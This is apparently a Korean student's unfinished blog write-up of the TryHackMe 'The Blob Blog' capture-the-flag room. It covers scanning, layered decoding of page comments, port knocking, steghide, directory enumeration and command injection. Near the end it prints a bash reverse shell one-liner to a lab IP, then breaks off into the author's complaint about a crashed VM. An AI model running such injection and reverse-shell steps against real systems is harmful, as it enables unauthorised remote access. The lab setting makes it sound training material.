안녕하세요 이번에 풀어볼 문제는 The Blob Blog입니다.
https://tryhackme.com/room/theblobblog
TryHackMe | Cyber Security Training
TryHackMe is a free online platform for learning cyber security, using hands-on exercises and labs, all through your browser!
tryhackme.com
우선 nmap을 이용하여 targetIP를 대상으로 scan을 진행
-sC : nmap의 기본 스크립트를 실행하여 서비스 버전 검출, 취약점 탐지, 기본 인증 확인, 기타 정보 수집과 같은 추가 정보들을 수집
-sV : 각 열린 포트에서 실행 중인 서비스의 이름과 버전을 식별
결과 : 22번 port와 80번 port가 활성화 되어 있음을 확인
browser를 이용해 target IP 탐색
기본 ubuntu website가 나오는 것을 알 수 있다. 추가적인 정보 습득을 위해 ctrl + u 를 통해 page source code 탐색 시작
주석에서 유의미한 정보 확인되며 이는 decoding 되어 있는 것으로 추정
우선 첫번째 주석을 https://gchq.github.io/CyberChef/ 해당 사이트에서 decoding 시작
CyberChef에서 base64로 decoding한 결과 특정 패턴의 문자열 발견
이는 brainfuck 언어라고 함. 이후 https://www.dcode.fr/brainfuck-language 에서 다시 decoding을 수행하게 되면
When I was a kid, my friends and I would always knock on 3 of our neighbors doors. Always houses 1, then 3, then 5!
이런 퀴즈가 나오게 됨
해당 퀴즈는 일단 넘어가고 2번째 주석에서 발견한 문자열을 다시 CyberChef에서 decoding 시작
CyberChef에서 base58로 decoding한 결과
이렇게 bob의 password를 유추해냄
[quiz에서 knockd에 대한 인지]
[knockd 설명과 nmap에 대한 추가적인 설명 필]
이제 숨겨져 있던 21번 port에서 실행중인 ftp 서비스에 대한 탐색 시작
[ftp란]
이제 ftp에 연결을 수행함
두번째 주석에서 decoding한 결과로 추론해낸 name과 password를 통해 접속에 성공
ftp를 탐색하던 중 cool.jpeg를 발견하였고
[get cool.jpeg에 대한 설명]
해당 이미지는 단순한 사람이 있는 사진이었음.
해당 이미지에서 숨겨진 데이터를 찾아보기 위해 streghide를 이용
역시 뭔가가 숨겨져 있다는게 확실해졌으나 비밀번호를 요구하니 이번에는 숨겨져 있던 445 port에 대한 탐색을 시작
browser에 targetIP:445 를 입력하여 연결
역시 browser에서는 기본 ubuntu website가 나오지만 주석에서 password가 나왔고 이를 위 cool.jpeg의 비밀번호로 입력하면
이렇게 out.txt가 나오게 되고 이는 내 컴퓨터의 cool.jpeg와 같은 경로에 out.txt 파일이 생성됨
그렇게 해당 파일을 열어보면
새로운 decoding된 문자열과 특정 경로인 /bobs_safe_for_stuff가 확인됨
해당 문자열을 [target IP]:445/bobs_safe_for_stuff 로 browser 검색함
검색 결과 새로운 문자열이 보임. CyberChef에서 해당 문자열을 key로 하여 Vigenère로 out.txt에 있던 incoding된 문자열을 decoding 하면 id와 password가 나옴
이제 숨겨져있던 8080포트에 대한 탐색을 시작
별다른 소득이 없었으므로 바로 gobuster를 이용해 지정된 URL의 디렉토리 및 파일을 열거하고, 숨겨진 디렉토리나 파일을 찾기 수행
/login 경로에서 status 200으로 유의미한 경로가 존재함을 확인했으니 해당 경로에 접근 시작
id와 password의 경우 out.txt에서 decoding해서 알게된 문자열을 입력하면 됨
그렇게되면 /blog의 경로로 연결됨.
또한 textFiled에 ls를 입력하고 submit을 누르고 here을 클릭하게 되면
위 사진과 같이 shell script가 수행됨을 알 수 있음.
이를 이용하여 https://www.revshells.com 에서 reverse shell script 생성
/bin/bash -i >& /dev/tcp/10.8.31.251/6666 0>&1
이후에 나의 kali에서 shell 을 열어줌
이후 위 reverse shell scipt를 textFiled에 넣고 수행하면
이렇게 reverse shell에 성공한다.
ㄹㄹㄹㄹ
[ㅕㄴㄱ// ㄴㅇㄹㄴㅇㄹㅇ]
------------------------------------------------------------------------------------------------------
문제 풀다가 잠깐 친구 침대에서 쉬고 있는데 vmware 속 kali linux가 자기 혼자 뽀삐뽀비뽀 뽀삐뽀 하면서 맛이 갔습니다.
작년 7월이 마지막 백업인데, 이 때가 본격적으로 보안 공부 시작했을 때입니다.
크롬이랑 vpn, proxy, brupsuite, 기타 코드 갑자기 다 날라 갔습니다.
아래는 마지막 남은 캡쳐본입니다. 문제 살짝 막혀서 진행상황 캡쳐만 해놓고 정리해서 올리려고 한 것들입니다.
어떻게 해야 할 지 모르겠습니다.
현재 친구집에서 한 달째 살고 있는데(기숙사 유기)
크롬 설치하는동안 소주 1병 혼자 마셨습니다.
여기 밤만 되면 인터넷이 이상합니다.
sudo apt update 하는데만 15분 걸렸습니다.
의지가 꺾였습니다.
내일 일어나서 세팅부터 다시해야 할 것 같습니다.
그리고 이 문제 안 풀거 같습니다.
안그래도 짜증났는데 그냥 더 짜증나졌습니다.
수고하세요.
-----------------------------------------------------
그와중
블로그 색인생성도 안되네요.
열뻗치게 할려고 작정을 한 거 같습니다.
진짜 수고하세요.
'보안 프로젝트' 카테고리의 다른 글
[TryHackMe] Basic Malware RE 문제풀이와 Ghidra를 이용한 reversing (0) | 2025.02.10 |
---|---|
[TryHackMe] CyberLens 문제풀이 (0) | 2025.01.25 |
[TryHackMe] Light 문제풀이 (0) | 2025.01.21 |
[TryHackMe] Silver Platter 문제풀이 (0) | 2025.01.16 |
[TryHackMe] Enumeration & Brute Force 문제풀이 (0) | 2025.01.13 |